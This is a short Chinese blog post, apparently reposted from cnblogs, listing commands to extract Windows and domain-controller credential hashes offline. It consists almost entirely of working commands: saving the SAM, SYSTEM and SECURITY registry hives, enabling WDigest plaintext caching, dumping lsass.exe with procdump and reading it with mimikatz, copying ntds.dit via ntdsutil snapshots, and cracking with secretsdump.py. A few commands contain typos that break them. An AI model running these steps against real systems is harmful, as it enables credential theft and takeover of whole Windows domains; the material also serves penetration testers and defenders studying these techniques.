码迷,mamicode.com
首页 > 其他好文 > 详细

离线提取域控HASH的方法

时间:2019-02-28 15:12:10      阅读:215      评论:0      收藏:0      [点我收藏+]

标签:system权限   top   sas   tor   image   lse   mimikatz   roc   ret   

1、注册表提取


提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可。

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security secruity.hive

本地获取

#如果要提取明文,请修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
#破解hash
python ./secretsdump.py -sam ~/Desktop/sam.hive  -security ~/Desktop/security.hive -system ~/Desktop/system.hive  LOCAL

技术图片

2、lsass.exe提取


procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz#privilege::debug
mimikatz#sekurlsa::minidump lsass.dmp
mimikatz#sekrulsa::logonpasswords full  

技术图片

3、ntds.dit提取


ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy MOUNT_POINT\windows\ntds\ntds.dit c:\temp\ntds.dit
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit

技术图片
技术图片

python ./secretsdump.py -ntds ~/Desktop/ntds.dit -system ~/Desktop/system.hiv  LOCAL

技术图片

离线提取域控HASH的方法

标签:system权限   top   sas   tor   image   lse   mimikatz   roc   ret   

原文地址:https://www.cnblogs.com/KevinGeorge/p/10450034.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!